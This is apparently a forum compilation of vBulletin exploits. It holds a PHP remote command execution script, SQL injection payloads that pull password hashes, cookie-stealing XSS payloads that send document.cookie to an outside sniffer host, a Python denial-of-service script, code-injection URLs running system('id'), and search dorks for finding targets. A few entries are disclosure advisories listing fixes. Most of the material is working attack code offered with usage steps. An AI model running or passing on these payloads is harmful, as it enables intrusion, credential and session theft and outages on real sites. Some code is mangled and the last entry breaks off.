            for 
line in fin:
                
pieces line.strip("\n").split(" ")
                if 
pieces[0].count(ext) == 1:
                    
upath pieces[1]
                    
hurl url "/" upath.strip("/")
                    while 
threading.active_count() > mthreads:
                        
pass
                    Download
(hurl).start()
    while 
threading.active_count() > 1:
        
pass

  
class Download(threading.Thread):

    
def __init__(selfurl):
        
threading.Thread.__init__(self)
        
self.url url

    def run
(self):
        try:
            
with urllib.request.urlopen(self.url) as usock:
                
data usock.read()
                
uparser urllib.parse.urlparse(usock.geturl())
                
pieces uparser.path.split("/")
                
fname pieces[len(pieces) - 1]
                
with open(fname"wb") as fout:
                    
fout.write(data)
        
except:
            
pass

  
if __name__ == "__main__":
    
main()  
vBulletin remote file disclosure exploit. Written in Python.

James Bercegay/vBulletin Search UI SQL Injection

Código:
vBulletin "Search UI" SQL Injection: Take Two
 
It looks like someone has found another SQL Injection bug in the vBulletin "Search UI". After taking a quick look @ the bug, I have determined it to be exploitable, pre auth.
 
The actual SQL Injection lies within the add_advanced_search_filters() function. This is due to vBulletin not sanitizing the "messagegroupid" and "categoryid" arrays before implode()'ing them directly into a SQL query.
 
Exploiting this issue is fairly straight forward, but is pretty much a blind SQL Injection as far as I can tell in the small amount of time I have looked at it. However, using the methods outlined here, one can easily extract data at the expense of possibly tipping off the database admin. This is because vBulletin displays the verbose SQL query within HTML comments whenever displaying an SQL error screen. (Even for non authenticated users)
 
 
Proof of concept:
 
POST /search.php?do=process HTTP/1.1  
Host: 127.0.0.1  
Content-Type: application/x-www-form-urlencoded  
humanverify[]=&amp;searchfromtype=vBForum%3ASocialGroupMessage&amp;do=process&amp;contenttypeid=5&amp;categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*  
 
 
The above post query will successfully display the passsword hash for the userid=1 within the comments of the SQL error page used by vBulletin, as seen in the example below.
 
<!--  
Database error in vBulletin 4.1.4:  
Invalid SQL:  
                         SELECT socialgroupcategory.title  
                         FROM socialgroupcategory AS socialgroupcategory  
                         WHERE socialgroupcategory.socialgroupcategoryid IN (-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*);  
MySQL Error  : Duplicate entry '4c62730e24e31ab9a0b8229a7ff72836:1' for key 'group_key'  
Error Number : 1062  
Request Date : Wednesday, July 20th 2011 @ 10:24:59 PM  
Error Date  : Wednesday, July 20th 2011 @ 10:24:59 PM  
Script    : http://127.0.0.1/search.php?do=process  
Referrer   :   
IP Address  : 127.0.0.1  
Username   : Unregistered  
Classname   : vB_Database  
MySQL Version :   
-->  
 
 
And of course if you prefer to exploit this in a more stealthy manner, there is always a blind SQL Injection approach using timed BENCHMARK() queries, etc. that will likely work for you.
vBulletin suffers from a Search UI remote SQL injection vulnerability. Proof of concept code included.

AL3NDALEEB/vbulletin-3.0.4.txt 

Código:
Exploit:
----------------
http://site/forumdisplay.php?GLOBALS[]=1&amp;f=2&amp;comma=".system('id')."
 
Conditions:
----------------
1st condition     : $vboptions['showforumusers'] == True , the admin must set
        showforumusers ON in vbulletin options.
 
2nd condition     : $bbuserinfo['userid'] == 0 , you must be an visitor/guest.
 
3rd condition     : $DB_site->fetch_array($forumusers) == True , when you
        visit the forums, it  must has at least one user show the forum.
 
4th condition     : magic_quotes_gpc must be OFF
 
SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in
        init.php by secret array GLOBALS[]=1 ;)))
vBulletin v3.0.4 remote command execution exploit. Takes advantage of a bug in forumdisplay.php.

AL3NDALEEB/vbulletin-3.0.4-2.txt 

Código PHP:
<?php /**************************************************************
#
# vbulletin 3.0.x execute command by AL3NDALEEB al3ndaleeb[at]uk2.net
#
# First condition : $vboptions['showforumusers'] == True , the admin must set
# showforumusers ON in vbulletin options.
# Second condition: $bbuserinfo['userid'] == 0 , you must be an visitor/guest .
# Third condition : $DB_site->fetch_array($forumusers) == True , when you
# visit the forums, it must has at least
# one user show the forum.
# Fourth condition: magic_quotes_gpc must be OFF
#
# Vulnerable Systems:
# vBulletin version 3.0 up to and including version 3.0.4
#
# Immune systems:
# vBulletin version 3.0.5
# vBulletin version 3.0.6
#
**************************************************************/
  
if (!(function_exists('curl_init'))) {
echo 
"cURL extension required\n";
exit;
}

if (
$argv[3]){ $url $argv[1]; $forumid intval($argv[2]); $command $argv[3];
}
else {
echo 
"vbulletin 3.0 > 3.0.4 execute command by AL3NDALEEB al3ndaleeb[at]uk2.net\n\n";
echo 
"Usage: ".$argv[0]." <url> <forumid> <command> [proxy]\n\n";
echo 
"<url> url to vbulletin site (ex: http://www.vbulletin.com/forum/)\n";
echo 
"<forumid> forum id\n";
echo 
"<command> command to execute on server (ex: 'ls -la')\n";
echo 
"[proxy] optional proxy url (ex: http://proxy.ksa.com.sa:8080)\n\n";
echo 
"ex :\n";
echo 
"\tphp vb30x.php http://www.vbulletin.com/forum/ 2 \"ls -al\"";

exit;
}

if (
$argv[4]) $proxy $argv[4];


  
$action 'forumdisplay.php?GLOBALS[]=1&amp;f='.$forumid.'&amp;comma=".`echo _START_`.`'.$command.'`.`echo _END_`."';
  
$ch=curl_init();
if (
$proxy){ curl_setopt($chCURLOPT_PROXY,$proxy);
curl_setopt($chCURLOPT_URL,$url.'/'.$action); curl_setopt($chCURLOPT_RETURNTRANSFER,1); $res=curl_exec ($ch); curl_close ($ch); $res substr($resstrpos($res'_START_')+7); $res substr($res,0strpos($res'_END_'));
echo 
$res;

  
?>
vBulletin v3.0 through 3.0.4 remote command execution exploit, written in PHP. Takes advantage of a bug in forumdisplay.php.

Thomas Waldegger/20050917-vbulletin-3.0.8.txt 

Código:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 ---------------------------------------------------
| BuHa Security-Advisory #3     |    Sep 17th, 2005 |
| feat. SePro Bugtraq           |                   |
 ---------------------------------------------------
| Vendor   | vBulletin                              |
| URL      | http://vbulletin.com/                  |
| Version  | <= vBulletin 3.0.9                     |
| Risk     | Moderate (SQL-Injection and            |
|          |           Arbitrary File Upload)       |
 ---------------------------------------------------
 
First of all I want to express my disappointment with the behavior of
the vbulletin.com and vbulletin-germany.com team and the missing
cooperation. We sent them a mail with a list of security issues and they
immediately answered that they are going to look into these bugs. We
never got another mail with information about the problems they fixed -
they also did not inform us about the release of the latest version
which *should* address all known security problems. So it comes as no
surprise that they missed to fix a lot of moderate security bugs in the
latest version. They did not consider it necessary to release *any*
information about patched security problems in their announcement [1]
for the current version too. Some thanks/credits for our trouble/time
with the audit would have been a nice gesture but who cares.
 
o Description:
=============
 
vBulletin is a powerful, scalable and fully customizable forums package
for your web site. It has been written using the Web's quickest-growing
scripting language; PHP, and is complemented with a highly efficient
and ultra fast back-end database engine built using MySQL.
 
Visit http://vbulletin.com/ for detailed information.
 
o SQL-Injection: (Fixed in vB 3.0.9)
===============
 
> /joinrequests.php:
POST: <do=processjoinrequests&amp;usergroupid=22&amp;request[[SQL-Injection]]=0>
 
> /admincp/user.php:
GET: <do=find&amp;orderby=username&amp;limitnumber=[SQL-Injection]>
GET: <do=find&amp;orderby=username&amp;limitstart=[SQL-Injection]>
 
> /admincp/usertitle.php:
GET: <do=edit&amp;usertitleid=0XF>
 
> /admincp/usertools.php:
GET: <do=pmuserstats&amp;ids=0XF>
 
o XSS: (Fixed in vB 3.0.9)
=====
 
> /admincp/css.php:
GET: <do=doedit&amp;dostyleid=1&amp;group=[XSS]>
 
> /admincp/index.php:
GET: <redirect=[XSS]>
 
> /admincp/user.php:
GET: <do=emailpassword&amp;email=[XSS]>
 
> /admincp/language.php:
GET: <do=rebuild&amp;goto=[XSS]>
 
> /admincp/modlog.php:
GET: <do=view&amp;orderby=[XSS]>
 
> /admincp/template.php:
GET: <do=colorconverter&amp;hex=[XSS]>
GET: <do=colorconverter&amp;rgb=[XSS]>
GET: <do=modify&amp;expandset=[XSS]
 
o Arbitrary File Upload:
=======================
 
An user with access to administrator panel (e.g. (Co)Administrator) and
the privilege to add avatars/icons/smileys is able to upload arbitrary
files. An attacker is able to gain the ability to execute commands under
the context of the web server.
 
> /admincp/image.php:
POST: <do=upload&amp;table=avatar>
POST: <do=upload&amp;table=icon>
POST: <do=upload&amp;table=smilie>
 
This issue is not addressed in vBulletin 3.0.9.
 
o Unpatched Bugs:
================
 
> /modcp/announcement.php:
POST: <do=update&amp;announcementid=1&amp;start=24-07-05&amp;end=30-07-05
&amp;announcement[0]=[SQL-Injection]>
 
> /modcp/user.php:
GET: <do=avatar&amp;userid=0XF>
 
There are still a lot of security related bugs in the administrator
panel of the vBulletin software. An authorized user could elevate his
privileges and read sensitive data.
 
> /admincp/admincalendar.php:
POST: <do=update&amp;calendarid=1&amp;calendar[daterange]=1970-2030&amp;
calendar[0]=[SQL-Injection]>
POST: <do=updatemod&amp;moderatorid=1&amp;moderator[calendarid]=0XF>
 
> /admincp/cronlog.php:
POST: <do=doprunelog&amp;cronid=0XF>
POST: <do=prunelog&amp;cronid=0XF>
 
> /admincp/email.php:
POST: <do=makelist&amp;user[usergroupid][0]=[SQL-Injection]>
 
> /admincp/help.php:
POST: <do=doedit&amp;help[script]=1&amp;help[0]=[SQL-Injection]>
 
> /admincp/language.php:
POST: <do=update&amp;rvt[0]=[SQL-Injection]>
 
> /admincp/phrase.php:
POST: <do=completeorphans&amp;keep[0]=[SQL-Injection]>
 
> /admincp/usertools.php:
POST: <do=updateprofilepic>
 
Even a privileged user should not be able to add posts, titles,
announcements etc. with HTML/JavaScript-Code in it.
 
> Not properly filtered: (XSS)
</admincp/announcement.php>
</admincp/admincalendar.php>
</admincp/bbcode.php>
</admincp/cronadmin.php>
</admincp/email.php?do=genlist>
</admincp/faq.php?do=add>
</admincp/forum.php?do=add>
</admincp/image.php?do=add&amp;table=avatar/icon/smilie>
</admincp/language.php>
</admincp/ranks.php?do=add>
</admincp/replacement.php?do=add>
</admincp/replacement.php?do=edit>
</admincp/template.php?do=addstyle>
</admincp/template.php?do=edit>
</admincp/usergroup.php?do=add>
</admincp/usertitle.php>
 
o Disclosure Timeline:
=====================
 
20 Jul 05 - Security flaws discovered.
29 Jul 05 - Vendor contacted.
09 Sep 05 - Vendor released 'bugfixed' version.
17 Sep 05 - Public release.
 
o Solution:
==========
 
Upgrade to vBulletin 3.0.9 [1] to fix some of the issues mentioned in
this advisory. Maybe the next vBulletin release fixes the still
unpatched security related bugs.
 
o Credits:
=========
 
deluxe <deluxe@security-project.org>
 
- ---
 
Thomas Waldegger <bugtraq@morph3us.org>
BuHa-Security Community - http://buha.info/board/
 
If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address 'bugtraq@morph3us.org' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at
http://morph3us.org/ to contact me.
 
Greets fly out to cyrus-tc, destructor, nait, rhy (you Pongo-Pongo king,
eh!1! :oP), trappy and all members of BuHa.
 
Advisory online: http://morph3us.org/advisories/20050917-vbulletin-3.0.8.txt
 
[1] http://www.vbulletin.com/forum/showthread.php?p=961409
 
- --
M$ is not the answer. M$ is the question. The answer is NO!!1!
BuHa-Security Community: http://buha.info/board/
 
-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/
 
iD8DBQFDLTrpUXI2fw/BTWcRAjAMAKCqHE41PnbTjdGl65R8H7Ju7B0CBwCgp/dd
+nRt0ghXoiA88M54F/MIy1U=
=zg38
-----END PGP SIGNATURE-----
vBulletin versions 3.0.9 and below suffer from multiple SQL injection, cross site scripting, and arbitrary file upload vulnerabilities. Detailed exploitation provided.

Mr.ThieF/vBulletin VBExperience Cross Site Scripting

Código:
++++++++++++++++++++++++++++++++++++++++
[~] Author : Mr.ThieF <~
 
[~] Contact : Mr.ThieF@yahoo.com <~
 
[~] DorK : inurl:xperience.php
 
[~] Software Link : http://www.vbulletin.org/forum/showthread.php?t=245023
 
[~] Version : 4.x.x - 3.x.x
 
[~] Exploit :
 
http://[site]/[path]/xperience.php?go=ranking&amp;order=asc&amp;sort="><script>alert(1);</script>
 
[~] Example : 
 
http://www.vbaddict.net/xperience.php?go=ranking&amp;order=asc&amp;sort="><script>alert(1);</script>
 
++++++++++++++++++++++++++++++++++++++++
The vBExperience add-on as shipped with vBulletin versions 3.x.x and 4.x.x suffers from a cross site scripting vulnerability.

pokley/vBulletin <= 3.0.6 php Code Injection ( php)

Código:
# Tested on vBulletin Version 3.0.1 /str0ke 
# http://www.xxx.net/misc.php?do=page&template={${system(id)}} 
#
 
# [SCAN Associates Security Advisory]
# http://www.scan-associates.net
 
Proof of concept
================
http://site.com/misc.php?do=page&template={${phpinfo()}}
 
# milw0rm.com [2005-02-22]
ROOT_EGY/vBulletin v 2.3 .* SQL Injection Vulnerability ( php)

Código:
# Title: vbulletin Vulnerability versions 2.3 .* - SQL injection.
# Author: Discovered by ROOT_EGY
# Version: vBulletin Version 2.3
 
===========================================================
                     www.sec-war.com
===========================================================
 
 
Vulnerability versions 2.3 .* - SQL injection in the validation of input data in 'calendar.php'. Sends SQL requests to the server.
For example:
www.server.som/forumpath/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies, public, userid, '0000-0-0 ', version (), userid FROM calendar_events WHERE eventid = 14) order by eventdate
Vulnerability to Version 2 .*.* - is introducing XSS script tag e-mail
[E * MAIL] aaa@aaa.aa » 's =' [/ E * MAIL] 'sss =» i = new Image (); i.src =' http://antichat.ru/cgi-bin/s . jpg? '+ document.cookie; this.sss = null »style = top: expression (eval (this.sss));
 
 
 
===========================================================
 
ROOT_EGY  to connect: r0t@hotmail.es
 
===========================================================
 
Greetz TO : Alnjm33 - Mr.xXx - EgY-Sn!per - red virus - ShOot3r - And All My Friends.
 
===========================================================
ROOT_EGY/vBulletin 3.0.0 XSS Vulnerability ( php)

Código:
# Title: vBulletin 3.0.0 XSS
# Author: Discovered by ROOT_EGY
# Version: vBulletin Version 3.0.0
 
===============================================
              WWW.sec-war.com
===============================================
 
3.0.0 - Introduction XSS scripts in the script search.php. In fact, a hole through a browser implemented.
Example: www.xhh777hhh.som/forumpath//search.php?do=process&showposts=0&query = <script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s. jpg? »+ document.cookie; </ script>
3.0-3.0.4 - implementation of commands in the script forumdisplay.php through incorrect handling of variables.
For example: www.xhh777hhh.som/forumpath/forumdisplay.php?GLOBALS [] = 1 & f = 2 & comma = ». System ( 'id').»
3.0.3-3.0.9 introduction XSS scripts in the Status field.
Way to change the status can only admins, for example, moderators. Is an example code sployta: <body onLoad=img = new Image(); img.src = «http://antichat.ru/cgi-bin/s.jpg?»+document.cookie;>
3.0.9 and 3.5.4 - introduction XSS scripts in parameter posthash scenario newthread.php.
Here primerchik:
www.site.com/forumpath/newthread.php?do=newthread&f=3&subject=1234&WYSIWYG_HTML =% 3Cp% 3E% 3C% 2Fp% 3E & s = & f = 3 & do = postthread & posthash = c8d3fe38b082b6d3381cbee17f1f1aca & poststarttime = '% 2Bimg = new Image (); img. src = «http://antichat.ru/cgi-bin/s.jpg?» + document.cookie;% 2B '& sbutton =% D1% EE% E7% E4% E0% F2% FC +% ED% EE% E2 % F3% FE +% F2% E5% EC% F3 & parseurl = 1 & disablesmilies = 1 & emailupdate = 3 & postpoll = yes & polloptions = 1234 & openclose = 1 & stickunstick = 1 & iconid = 0
 
===============================================
 
ROOT_EGY  to connect: r0t@hotmail.es
 
===============================================
 
Greetz TO : Alnjm33 - Mr.xXx - EgY-Sn!per - red virus - ShOot3r - And All My Friends.
 
===============================================
ROOT_EGY/vBulletin v3.5.2 XSS Vulnerabilities ( php)

Código:
# Title: vBulletin Version 3.5.2 - Introduction XSS scripting
# Author: Discovered by ROOT_EGY
# Version: vBulletin Version 3.5.2
 
===============================================
              WWW.sec-war.com
===============================================
 
3.5.2 - Introduction XSS scripting
The vulnerability is in the field «title» scenario «calendar.php».
Example:
TITLE :---> Test <script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s.jpg?» + Document.cookie; </ script>
BODY :----> No matter
OTHER OPTIONS: -> No matter
That all went off to go to the calendar, create a new event in the header to prescribe <script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s.jpg?» + Document. cookie; </ script>, then go look at the link, which is our event and give to the show to someone who want to steal a cookie.
3.5.3 - Introduction XSS scripts in the field «Email Address» in the module «Edit Email & Password».
Example:
 
www.server.som/forumpath/profile.php?do=editpassword
pass: your pass
email: vashe@milo.com "> <script> img = new Image (); img.src =« http://antichat.ru/cgi-bin/s.jpg? »+ document.cookie; </ script> . nomatt
Note About lenght limitation
****
forum / profile.php? do = editoptions
Receive Email from Other Members = yes
****
www.server.com/forumpath/sendmessage.php?do=mailmember&u = (your id)
In the email write vashe@milo.com "> <script> img = new Image (); img.src =« http://antichat.ru/cgi-bin/s.jpg? »+ Document.cookie; </ script>. nomatt. Once preserved, it is important to make the option email visible to all. Then the helmet someone www.xhh777hhh.som/forumpath/sendmessage.php?do=mailmember&u = (your id) and get a cookie on our address sniffer.
 
3.5.4 - Dump database
The vulnerability is in the scripts directory upgrade_301.php 'install'.
Example: server.com/forumpath/install/upgrade_301.php?step=SomeWord
 
3.5.4 - Introduction XSS scripting
The vulnerability is in the url parameter scenario inlinemod.php.
Example: www.server.com/forumpath/inlinemod.php?do=clearthread&url=lala2% 0d% 0aContent-Length:% 2033% 0d% 0a% 0d% 0a <html> Hacked! </ Html>% 0d% 0a% 0d% 0a
 
===============================================
 
ROOT_EGY  to connect: r0t@hotmail.es
 
===============================================
 
Greetz TO : Alnjm33 - Mr.xXx - EgY-Sn!per - red virus - ShOot3r - And All My Friends.
 
===============================================
FormatXformat/Vbulletin Blog 4.0.2 Title XSS Vulnerability ( php)

Código:
Vbulletin Blog 4.0.2 XSS Vulnerability
 
Author: FormatXformat
Version: Vbulletin 4.0.2
 
 
Dork:
Powered by vBulletin™  Version 4.0.2 Copyright © 2010 vBulletin Solutions, Inc. All rights reserved.
 
 
The script is affected by Permanent XSS vulnerability, so you can put in bad java script code
 
<script>alert('put this script in title')</script>
<meta http-equiv='Refresh' content='0;URL=http://db-exploit.com'>
 
1st register
 
Go to Blogs page
 
Create New Post
 
Inject your java script into Title Box
 
You must go back to Main page to see this XSS effect.
 
 
 
Greets: Neo, Sa3id, All Tkurd.net Members
Andhra Hackers/vBulletin "Cyb - Advanced Forum Statistics" DOS ( php)

Código:
# Exploit Title: vBulletin "Cyb - Advanced Forum Statistics" DOS
# Date: 10-4-2010
# Author: Andhra Hackers
# Software Link:
# Version: Web Application
# Tested on: Apcahe/Unix
# CVE : [if exists]
# Code :
 
 
PHP crashes existed from a long time back and there were several issues which were a reason for that.
1)PHP pack() function bug has been there for about a long time, were if PHP try to allocate more memory more than generally allocated to PHP function then the the request is terminated and PHP exits/Crashes, this might even send a huge load to the server.
 
2)PHP memory allocation is done via the php.ini file of PHP installation, So if we could make PHP try to load with more memmory than it could handle then we cold possibly crash php or even the server causing a huge CPU usage.
 
3)A vulnerability exist in vBulletin add-on "Cyb - Advanced Forum Statistics" in the misc.php file show=latestposts&vsacb_resnr=, were application loads all latest 'n' no of post
depending on (vsacb_resnr= n) value. As no of post "vsacb_resnr" is user specific,that means we could make vBulletin to load huge no of datas from DB causing it to run out of memory and crash PHP and huge load may crash hosted apache also and won't be able to recover easily.
 
Attached is exploit code which could easily crash a vBulletin which has got "Cyb - Advanced Forum Statistics" add-on installed.
Either You could Use the attached exploit code to DOS the server or you could Simply move to the vulnerable page and
sent simultaneous request by refreshing the page.
 
 
An attacker could exploit this issue to crash the php installed and the crash might DOS the entire server for hours or attacker will be able to
download php files from the server.
 
A quick fix for this is to modify php.ini config file and increase the Php allocated memory to a higher value.
 
 
Exploit:
import urllib,urllib2,re
print "####################################"
print "#[+]ICW 0-day Domain Crasher #"
print "#[+] Exploit found by Yash [ICW] #"
print "#[+] Exploit Coded by FB1H2S [ICW] #"
print "#[+] Care-Taker d4rk-blu [ICW] #"
print "#[+] Indian Cyber Warriors #"
print "####################################\n"
print "Enter Domain Adress:"
domain=raw_input("[+]Ex: www.site.com<http://www.site.com>:")
url ='http://'+domain+'/misc.php?show=latestposts&vsacb_resnr=10000000'
res = urllib.urlopen(url).read(200)
phpmem= re.findall('of (.*?)bytes.*?',res)
bytes=int(phpmem[0])
mb=bytes/1048576
print '[+]Server php memmory is:'+str(mb)+' MB'
print "[+]Enter the No of request you wann send:"
kill=raw_input("Some 20-30 will be enough:")
try:
for i in range(1,int(kill)):
print i
res1 = urllib.urlopen(url).read(200)
print res1
except(IOError),msg: print "Server will be done by now"
 
 
################################################################
C:\Python25>python vbexploit.py
####################################
#[+]ICW 0-day Domain Crasher #
#[+] Bug found by Yash [ICW] #
#[+] Exploit Coded by FB1H2S [ICW] #
#[+] Care-Taker d4rk-blu [ICW] #
#[+] Indian Cyber Warriors #
####################################
 
Enter Domain Adress:
[+]Ex: www.site.com<http://www.site.com>: sitehere
 
[+]Server php memmory is:32 MB
[+]Enter the No of request you wann send:20
1
2
3
Script will cause DOS.
 
 
#Yash (yash@andhrahackers.com<mailto:yash@andhrahackers.com>)
 
#################################################################################################
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]
#Thanks: SaiSatish,FB1H2S,d4rk-blu™,Mannu,Harin,Jappy,Dj Hoodlum Don,Sam,Circuit,cph4cker
#Shoutz: hg_H@x0r,r45c4l,41w@r10r,Hackuin
#Catch us at www.andhrahackers.com<http://www.andhrahackers.com> or www.teamicw.in<http://www.teamicw.in>
# Thnx to FB1H2S for Python Code :-)
n/a/vBulletin LAST.PHP SQL Injection Vulnerability ( php)

Código:
Example:
 
http://www.example.com/last.php?fsel=,user.password%20as%20title,user.%20%20%20%20username%20as%20lastposter%20FROM%20user,thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT%201
 
# milw0rm.com [2004-11-15]
MaXe/vBulletin 3.8.6 Credential Disclosure 

Código:
Versions Affected: 3.8.6 (Only!)
 
Info:
Content publishing, search, security, and more—vBulletin has it all. Whether
it’s available features, support, or ease-of-use, vBulletin offers the most for
your money. Learn more about what makes vBulletin the choice for people
who are serious about creating thriving online communities.
 
External Links:
http://www.vbulletin.com/
 
 
-:: The Advisory ::-
vBulletin is prone to information disclosure of the entire database
credentials used in config.php via the faq.php file.
 
By searching for "database" on a vulnerable installation of vBulletin
an attacker is shown the information mentioned above.
 
-:: Solution ::-
A patch is available from http://members.vbulletin.com
 
Alternatively, search for "database_ingo" in the Phrase Manager
within the Admin Control Panel, and delete or edit all critical details.
 
 
Disclosure Information:
- vBulletin Security Notice &amp; Patch: 22nd July 2010
- Vulnerability Researched and Disclosed: 22nd July
 
Note:
After searching the Internet a bit I discovered that I wasn't the
only one which knew about this bug. Please note that I give full
credit to the rightful finder / owner of this exploit.
 
References:
http://forum.intern0t.net/exploits-vulnerabilities-pocs/2857-vbulletin-3-8-6-critical-information-disclosure.html
http://www.vbulletin.com/forum/showthread.php?357818-Security-Patch-Release-3.8.6-PL1
 
 
 
All of the best,
MaXe
vBulletin version 3.8.6 suffers from a database credential disclosure vulnerability.

MaXe/vBulletin 4.0.8 Cross Site Scripting 

Código:
vBulletin - Persistent Cross Site Scripting via Profile Customization
 
 
Versions Affected: 4.0.8 (3.8.* is not vulnerable.)
 
Info:
Content publishing, search, security, and more— vBulletin has it all.
Whether it’s available features, support, or ease-of-use, vBulletin offers
the most for your money. Learn more about what makes vBulletin the
choice for people who are serious about creating thriving online communities.
 
External Links:
http://www.vbulletin.com
 
Credits: MaXe (@InterN0T)
 
 
-:: The Advisory ::-
vBulletin is prone to a Persistent Cross Site Scripting vulnerability within the
Profile Customization feature. If this feature is not enabled the vulnerability 
does not exist and the installation of vBulletin is thereby secure.
 
Within the profile customization fields, it is possible to enter colour codes,
rgb codes and even images. The image url() function does not sanitize user
input in a sufficient way causing vBulletin to be vulnerable to XSS attacks.
 
[1] Private Reflected XSS:
An attacker can inject scripts in a simple way, which is only visible to the attacker.
 
Proof of Concept:
url(</script><img src="x:x" onerror="alert(String.fromCharCode(73,110,116,101,114,78,48,84,11))" />)
(This is only visible to the attacker when he or she is logged in, and browsing his or her own profile.)
 
[2] Global Reflected XSS:
An attacker can inject malicious CSS data executing javascript, which is then visible
to anyone browsing the user profile. Even guests visiting the malicious user profile.
 
Proof of Concept: (IE6 only, may not work in IE7+ and FF)
url(/);background:url(javascript:document.write(1337))
url(/);width:expression(alert('www.intern0t.net'))
 
 
Please note that some of these strings may be too long to be injected. However a
blog entry at Exploit-DB and a video on YouTube will be released very soon.
 
 
-:: Solution ::-
Turn off profile customization immediately for users able to customize their profile!
When a security patch has been provided by the vendor, enable this feature again.
 
 
Disclosure Information:
- Vulnerability found and researched: 11th November 2010
- Vendor (vBulletin Solutions / IB) contacted: 11th November
- Disclosed to Exploit-DB, Bugtraq and InterN0T: 14th November
 
References:
http://forum.intern0t.net/intern0t-advisories/3349-vbulletin-4-0-8-persistent-xss-profile-customization.html
http://www.vbulletin.com/forum/showthread.php?366834-vbulletin-4-profile-customization-exploit
http://blip.tv/file/4381880
http://www.youtube.com/watch?v=LOcLFVAqgOU
vBulletin version 4.0.8 suffers from a persistent cross site scripting vulnerability.

mc2_s3lector/vBulletin 4.0.4 Code Execution 

Código:
/*======================================================================*\
|| #################################################################### ||
|| # Vurnerebility vBulletin - http://www.vbulletin.org               # ||
|| # Local or adserver Javascript,forumdisplay.php" Code Execution    # ||
|| # Version license 4.0.4                        # ||
|| # info set cookies, error issue &amp; critical-information-disclosure  # ||
|| # Dork powered by vBulletin 4.0.4                      # ||
|| # author mc2_s3lector                          # ||
|| # Contact|http://www.yogyacarderlink.web.id                # ||
|| #################################################################### ||
\*======================================================================*/
 
http://DNSname.com/patch/clientscript/vbulletin-core.js?v=
 
http://DNSname.com/patch/clientscript/vbulletin-core.js?v=(value)
 
http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=
 
http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&amp;f=2&amp;comma=".system('id')."
 
http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=1&amp;f=2&amp;comma=content-type=".allow put chart
 
/*======================================================================*\
|# #####################################################################  |
 # gretz: all family(www.yogyacarderlink.web.id)            # |         
|# v3n0m,m4rc0,eidelweis,Joglo,setanmuda,z0mb13,byebye,93l4p_9uL1t@,    # |
|# IdioT_InsidE,dewancc,craxboy90,lingga,horcux,artupas,s0ul_34t3r, # |
|# mywisdom,Travis,a9d1co0L,L4zyb0i,Jastis &amp; all            # |
|# KeDaiComputerworks.org                       # |
|# my bro one-d4y,elpaci4n0,Ariwira,h3ndry_Slank,raven_ville, t3j0,&amp; all# |                       
|# Indesign Computer Care,logcode.net,flowerjingga,.alboraaq.com    # |
|  #####################################################################  |
\*======================================================================*/
vBulletin version 4.0.4 suffers from a code execution vulnerability.

jos_ali_joe/vBulletin Downloads FileInfo SQL Injection 

Código:
===========================================
Vbulletin Downloads FileInfo SQL Injection 
===========================================
 
[+]Title   : Vbulletin Downloads FileInfo SQL Injection 
[+]Software    : FileInfo
[+]Vendor    : http://www.vbulletin.com
[+]Download   : http://www.vbulletin.com/download.php
[+]Author   : jos_ali_joe
[+]Contact   : josalijoe[at]yahoo[dot]com
[+]Home    : http://josalijoe.wordpress.com/
 
.___             .___                                .__                 _________              .___                
|   |  ____    __| _/  ____    ____    ____    ______|__|_____     ____  \_   ___ \   ____    __| _/  ____  _______ 
|   | /    \  / __ |  /  _ \  /    \ _/ __ \  /  ___/|  |\__  \   /    \ /    \  \/  /  _ \  / __ | _/ __ \ \_  __ \
|   ||   |  \/ /_/ | (  <_> )|   |  \\  ___/  \___ \ |  | / __ \_|   |  \\     \____(  <_> )/ /_/ | \  ___/  |  | \/
|___||___|  /\____ |  \____/ |___|  / \___  >/____  >|__|(____  /|___|  / \______  / \____/ \____ |  \___  > |__|   
          \/      \/              \/      \/      \/          \/      \/         \/              \/      \/         
 
 
########################################################################
 
Dork : inurl:"downloads/fileinfo.php"
 
########################################################################
 
------------------------------------------------------------------------
 
SQL Exploit
 
Exploit : +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,concat(username,0x3a,password,0x3a,salt ),19,20,21,22,23,24,25,26+from+user/*
 
Demo 
 
Exploit : http://localhost/downloads/fileinfo.php?id=-461+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,concat(username,0x3a,password,0x3a,salt),19,20,21,22,23,24,25,26+from+user/*
 
--------------------------------------------------------------------------
 
 
Greets For :
 
./Devilzc0de crew - Kebumen Cyber - Explore Crew - Indonesian Hacker - Tecon Crew - Security Hub
 
./Byroe Net - Yogya Carderlink - anten4 - All Underground Forum Indonesia
 
My Team : ./Indonesian Coder &amp; inj3ct0r
 
Special Thanks :
 
Security Reason - Packetstorm Security
 
 
[+] Note : 
 
Hacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang kamu ambil untuk mencari jawaban. 
Jika kamu membutuhkan bantuan, Jangan bertanya untuk mendapatkan jawaban, 
Bertanyalah tentang jalan yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri.
vBulletin Downloads FileInfo suffers from a remote SQL injection vulnerability.

Robert Gilbert/vBulletin 4.1.3 Open Redirect

Código:
Product: vBulletin
Version: 3 - 4.1.3
Release Date: 06/02/2011
Risk: Low
Authentication: Not required to exploit.
Remote: Yes
 
Description: 
